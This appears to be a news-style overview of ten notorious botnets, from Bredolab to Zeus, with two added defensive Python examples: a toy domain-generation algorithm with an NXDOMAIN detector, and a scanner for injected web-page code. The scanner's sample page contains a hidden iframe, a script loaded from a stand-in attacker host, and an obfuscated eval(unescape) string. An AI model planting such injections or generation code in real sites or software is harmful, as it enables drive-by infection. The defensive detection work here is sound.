Botnets: Trouble From A To Zbot

So Many Botnets, So Little Time

It seems like you can't turn on your computer without reading about a new botnet rapidly infecting users around the world. Botnets, networks of compromised computers controlled from a command-and-control (C&C) server, have gained notoriety in recent years in part because they are one of the easiest and most efficient ways for cyber criminals to distribute malware.

Crimeware kits make botnet creation a cinch, and organized crime gangs are now in the business of renting out botnets to low-level cyber criminals. Plus, botnets are very hard to stop once they gain momentum.

Consequently, we'll likely see even more botnets invade the security landscape over the next 12 months.

Here are 10 of the botnet threats to watch.


Every botnet has some kind of calling card. Bredolab's was spyware: the botnet was notorious for pushing out information-stealing malware that let its operators capture bank login credentials and other sensitive data from compromised computers. Since it first surfaced in July 2009, it has infected an estimated 30 million computers worldwide.

At its peak, Bredolab was capable of infecting up to 3 million computers per month and was responsible for 3.6 billion spam e-mails a day carrying the Bredolab malware, according to the Dutch High Tech Crime Team.

Last month, Dutch police and network security organizations dismantled 143 of the command-and-control servers associated with Bredolab, disconnecting them from Netherlands-based hosting provider LeaseWeb, which had housed the servers on its IP space.


The infamous Conficker botnet rocked the world in 2009, spreading rapidly and infecting millions of machines through a variety of attack vectors, from brute-force guessing of passwords for network shares to autorun on USB sticks.

The first versions, Conficker A and B, rapidly propelled the malware around the globe. One of the worm's most distinctive features was that it patched, on each machine it infected, the very vulnerability it had used to get in, possibly to keep competing malware from compromising the same host.

Version C dropped A and B's propagation features but added numerous defensive measures designed to evade detection and removal: it disabled Windows Automatic Updates and Windows Security Center, blocked access to several security vendors' Web sites and rendered numerous antivirus products useless, and sharply increased the number of domains it checked each day for updates (from 250 to 50,000), which made it impractical for defenders to pre-register or block them all.
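The update-domain trick is what made Conficker C so hard to cut off: if a bot derives thousands of candidate rendezvous domains a day from a date-seeded algorithm, defenders must know the seed and the algorithm to pre-register or sinkhole them, while the bots' failed lookups show up as bursts of NXDOMAIN answers in resolver logs. The Python below is an added example, not code from the article or from Conficker: the generator is a toy date-seeded scheme whose seed and TLD list are assumptions (Conficker's real algorithm is different), and the resolver log lines and their `client=... q=... rcode=...` format are constructed for the example.

```python
"""Toy date-seeded domain generator plus an NXDOMAIN-burst detector.

Added example: the generator only imitates the shape of a botnet's daily
rendezvous-domain list (it is not Conficker's algorithm), and the seed, TLD
set and resolver log format below are assumptions made for this example.
"""
import hashlib
import re
from collections import defaultdict
from typing import Dict, List, Optional

TLDS = ["com", "net", "org", "info", "biz"]          # assumed TLD set for the toy generator
LOG_RE = re.compile(r"^(?P<ts>\S+) client=(?P<client>\S+) q=(?P<qname>\S+) rcode=(?P<rcode>\S+)$")


def toy_dga(day: str, count: int, seed: bytes = b"example-seed") -> List[str]:
    """Return `count` pseudo-random domains for the ISO date string `day`.

    Raising `count` from hundreds to tens of thousands is exactly the lever the
    text describes: every candidate must be registered or blocked in advance,
    which is only feasible for someone who knows the seed and the algorithm.
    """
    domains = []
    for i in range(count):
        h = hashlib.sha256(seed + day.encode() + i.to_bytes(4, "big")).digest()
        label = "".join(chr(ord("a") + b % 26) for b in h[:8 + h[8] % 5])  # 8 to 12 letters
        domains.append(f"{label}.{TLDS[h[9] % len(TLDS)]}")
    return domains


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Parse one resolver log line; return None for lines in another format."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def flag_dga_clients(lines, min_queries: int = 20, nx_ratio: float = 0.8) -> Dict[str, Dict[str, int]]:
    """Flag clients whose lookups are mostly NXDOMAIN.

    Unregistered rendezvous names are the observable side effect of a bot
    walking its daily list; a few typos from a real user stay well below the
    ratio, so both a volume floor and a ratio threshold are applied.
    """
    stats = defaultdict(lambda: {"total": 0, "nx": 0, "nx_names": set()})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue                                  # tolerate junk rather than abort the run
        s = stats[rec["client"]]
        s["total"] += 1
        if rec["rcode"] == "NXDOMAIN":
            s["nx"] += 1
            s["nx_names"].add(rec["qname"])
    flagged = {}
    for client, s in stats.items():
        if s["total"] >= min_queries and s["nx"] / s["total"] >= nx_ratio:
            flagged[client] = {"total": s["total"], "nxdomain": s["nx"],
                               "distinct_nxdomain": len(s["nx_names"])}
    return flagged


def build_sample_log() -> List[str]:
    """Constructed resolver log: one ordinary workstation (10.0.0.7) and one
    host (10.0.0.5) walking a 50-name toy DGA list of which only the last two
    resolve, standing in for the names the operators actually registered."""
    lines = []
    benign = ["www.example.com", "mail.example.com", "cdn.example.net", "time.example.org"]
    for i in range(24):
        lines.append(f"2010-11-01T09:{i:02d}:00 client=10.0.0.7 q={benign[i % 4]} rcode=NOERROR")
    lines.append("2010-11-01T09:24:00 client=10.0.0.7 q=wwww.example.com rcode=NXDOMAIN")  # a typo
    for i, name in enumerate(toy_dga("2010-11-01", 50)):
        rcode = "NOERROR" if i >= 48 else "NXDOMAIN"
        lines.append(f"2010-11-01T10:{i:02d}:00 client=10.0.0.5 q={name} rcode={rcode}")
    lines.append("unrelated syslog noise that does not parse")
    return lines


if __name__ == "__main__":
    for client, summary in flag_dga_clients(build_sample_log()).items():
        print(client, summary)
```

The volume floor and the ratio threshold are the two knobs: a workstation that mistypes a few names stays under them, while a host walking a list of unregistered domains is flagged along with a count of distinct failed names, which also hints at how long its daily list is.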


The Gumblar botnet was first detected in March 2009 and had its heyday that same year, at one point surpassing Conficker in infection rate.

Since then, Gumblar has spread rapidly, becoming one of the biggest threats on the Internet by exploiting Web browsers and browser plug-ins such as Adobe Acrobat, Reader and Flash Player. Visitors to a compromised site are served malicious PDF and Flash files that exploit security flaws in the software handling them, so victims are infected in a drive-by download without any user intervention.

The infection then searches the victim's system for stored FTP credentials, which the attackers use to log in to Web sites the victim administers and plant the same attack code there. That loop is how Gumblar has compromised so many legitimate Web sites: every site it infects becomes a new drive-by infection point, so the botnet grows without ever needing to spread from PC to PC.
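Because the attack code lands inside pages the site owner already trusts, the practical check is to scan the web root for the telltale additions: hidden iframes, script tags pulling from hosts the site never used, and inline scripts that unpack themselves from escaped strings. The Python below is an added example, not the article's or Gumblar's code; the two sample pages, the trusted-host allowlist and the `.invalid` attacker hostnames are constructed for the example, and the heuristics are generic indicators of injected drive-by code rather than a Gumblar signature.

```python
"""Heuristic scan of HTML pages for injected attack code.

Added example, not the article's or Gumblar's code. The sample pages, the
trusted-host allowlist and the `.invalid` attacker hostnames are constructed
for this example; the rules are generic indicators of injected drive-by code,
not a Gumblar signature.
"""
import os
import re
from typing import Dict, List

# Hosts this (hypothetical) site legitimately loads scripts from.
TRUSTED_SCRIPT_HOSTS = {"www.example.com", "cdn.example.com"}

HIDDEN_IFRAME = re.compile(
    r"<iframe\b[^>]*(?:width\s*=\s*[\"']?0\b|height\s*=\s*[\"']?0\b|display\s*:\s*none)[^>]*>", re.I)
EXTERNAL_SCRIPT = re.compile(r"<script\b[^>]+src\s*=\s*[\"']https?://([^/\"'\s]+)", re.I)
INLINE_SCRIPT = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
# Self-unpacking code: two or more of these in one block is rarely hand-written site JS.
OBFUSCATION_HINTS = ("eval(", "unescape(", "fromCharCode", "document.write(")
# A long run of %xx or \xNN escapes is the usual shape of a packed payload string.
ESCAPED_RUN = re.compile(r"(?:%[0-9a-f]{2}|\\x[0-9a-f]{2}){16,}", re.I)


def scan_html(html: str) -> List[Dict[str, str]]:
    """Return one finding per suspicious construct in a page."""
    findings = []
    for m in HIDDEN_IFRAME.finditer(html):
        findings.append({"rule": "hidden_iframe", "snippet": m.group(0)[:80]})
    for m in EXTERNAL_SCRIPT.finditer(html):
        host = m.group(1).lower()
        if host not in TRUSTED_SCRIPT_HOSTS:
            findings.append({"rule": "untrusted_script_src", "snippet": host})
    for m in INLINE_SCRIPT.finditer(html):
        body = m.group(1)
        hints = sum(1 for h in OBFUSCATION_HINTS if h in body)
        if hints >= 2 or ESCAPED_RUN.search(body):
            findings.append({"rule": "obfuscated_inline_script", "snippet": body.strip()[:80]})
    return findings


def scan_tree(root: str, exts=(".html", ".htm", ".php")) -> Dict[str, List[Dict[str, str]]]:
    """Walk a web root (the files an FTP-level compromise could have touched)
    and report findings per file; files that cannot be read are skipped."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                try:
                    with open(path, encoding="utf-8", errors="replace") as fh:
                        hits = scan_html(fh.read())
                except OSError:
                    continue
                if hits:
                    report[path] = hits
    return report


# Constructed sample pages for the example.
CLEAN_PAGE = """<html><head>
<script src="https://cdn.example.com/app.js"></script>
</head><body>
<p>Welcome.</p>
<script>document.getElementById("year").textContent = "2010";</script>
</body></html>"""

INJECTED_PAGE = CLEAN_PAGE.replace("</body>", """
<iframe src="http://drive-by.invalid/" width="0" height="0" style="display:none"></iframe>
<script src="http://static.attacker.invalid/x.js"></script>
<script>eval(unescape("%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%29"));</script>
</body>""")


if __name__ == "__main__":
    for finding in scan_html(INJECTED_PAGE):
        print(finding["rule"], finding["snippet"])
```

Run `scan_tree("/var/www")` (or wherever the site lives) against a known-good backup first: a site that legitimately uses `document.write` or zero-size iframes will need its allowlist and hints tuned, and the output is a triage list, not proof of compromise. The FTP side matters too: if credentials were stolen from an infected PC, cleaning the pages without rotating those passwords just invites the next re-injection.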


The Kneber botnet was first detected earlier this year after infecting more than 74,000 PCs around the world.

Security experts believe that, rather than cashing out the stolen data themselves, the hackers behind Kneber aimed to make their money by renting the botnet out to cyber crime organizations and rogue governments.

Targets have included some 2,411 organizations, Paramount Pictures and Juniper Networks among them.

Meanwhile, the botnet's operators have even poisoned search engine results, so that many of the top links on Google's results pages lead to malware sites. According to a Symantec Security Response blog post, the highest-ranked Google result for Kneber-related search terms led to a site hosting rogue antivirus software.


Pushdo has been around since 2007. While it hasn't received as much media attention as Conficker or Storm, it reportedly holds its place as the second-largest spam botnet in the world, sending approximately 7.7 billion e-mails per day, according to MessageLabs.

But its lack of notoriety is no fluke; the cyber criminals behind it have gone to great lengths to keep it under the radar, according to a Trend Micro report. Pushdo's authors disguise the malware as many different variants, most of which antivirus products flag only as "generic detections." Almost all of Pushdo's components reside in memory rather than on disk, making detection harder still. And the bot has no means of self-replication, relying on other channels to be distributed, while its owners frequently update its code and functions.


Once responsible for sending out 20 percent of the world's spam, Storm dominated the threat landscape, bombarding e-mail users with malware and spam campaigns. Storm has since been quelled, in part by the proliferation of more sophisticated security tools, and was considered defunct by 2008.

However, in recent months Storm has been attempting a comeback, infecting PCs with a downloader Trojan that installs further malware and fake antivirus software on the victim's machine.

Once the malware is on a computer, it connects to the spam bot server, which responds with the instructions and e-mail templates needed to generate and send massive volumes of spam.

Some of the biggest Storm-distributed spam campaigns have pushed online pharmacies, dating sites, celebrity scandals and impotence remedies.


What separates the Stuxnet worm from earlier malware is its "search and destroy" capability, built specifically to target industrial facilities such as chemical plants and power plants that run Supervisory Control and Data Acquisition (SCADA) systems. Specifically, Stuxnet can modify the code on programmable logic controllers (PLCs), the devices that directly control the machinery at power plants and other industrial facilities.

Stuxnet made headlines after it infected computers at Iran's Bushehr nuclear power plant, as indicated by traces of its code on the Siemens industrial control software that runs operations at the facility. The attack prompted the U.S. to run a coordinated cyber attack simulation to test the nation's defenses against an all-out cyber war.


Rustock has also come out of the shadows to pummel users with spam, about 39 percent of global spam according to Symantec reports.

Rustock is most famous for spam campaigns pushing cheap and bogus medications through "Canadian Pharmacy," a rogue online pharmacy peddling Viagra, Cialis, Lipitor and other commonly prescribed drugs.

But unlike its counterparts, this botnet has a survival mechanism of its own: the spam it sends is encrypted. Rustock delivers up to 77 percent of its spam over connections protected with Transport Layer Security (TLS), the successor to Secure Sockets Layer (SSL), using the same STARTTLS upgrade that mail servers offer to protect legitimate e-mail in transit. The encryption hides the message content from network-level inspection between the bot and the receiving mail server; the receiving server itself still sees the plaintext once the connection is decrypted, so the protection is against sensors on the wire, not against filtering at the destination.

Some experts think that Rustock's encryption is meant to protect the botnet's command-and-control layer from being shut down. The spam botnet was knocked offline when its hosting provider, McColo, was cut off in 2008; it eventually returned, albeit weakened and at great cost to its bot herders.


The Waledac botnet, one of the ten largest networks of compromised computers on the Internet, earned its reputation by pushing spam and fake Web site campaigns.

Waledac's authors spread the malware through deliberate campaigns of spam and spoofed Web sites, usually relying on some kind of social engineering trickery to get the victim to run it.

In recent months Microsoft, together with other members of the security and academic communities, has made a concerted effort to thwart the botnet, obtaining permission from a Virginia court to cut off 277 Internet domains used by Waledac's command-and-control infrastructure.

Prior to the domain takedown, Microsoft counted around 651 million spam messages sent by Waledac to Hotmail accounts alone, and estimated that the botnet was sending about 1.5 billion spam messages per day.


One of the most established botnets in circulation, Zbot, also known as the Zeus botnet, has so far infected millions of users and shows no sign of stopping.

Dubbed the "King of Bots," Zeus is particularly lucrative because it specifically targets the customers of banks and other high-value financial institutions, stealing their online banking credentials from infected PCs.

That fact is not lost on the criminal underground. Zbot has grown exponentially in part because of the pervasiveness of construction kits, which are on sale and widely available to the hacker community. According to a Kaspersky Lab report, Zeus has become one of the most commonly used and best-selling spy programs on the online black market.

As a testament to its popularity, the notorious banking botnet was recently used by an international cyber crime ring to steal around $70 million from U.S. bank accounts.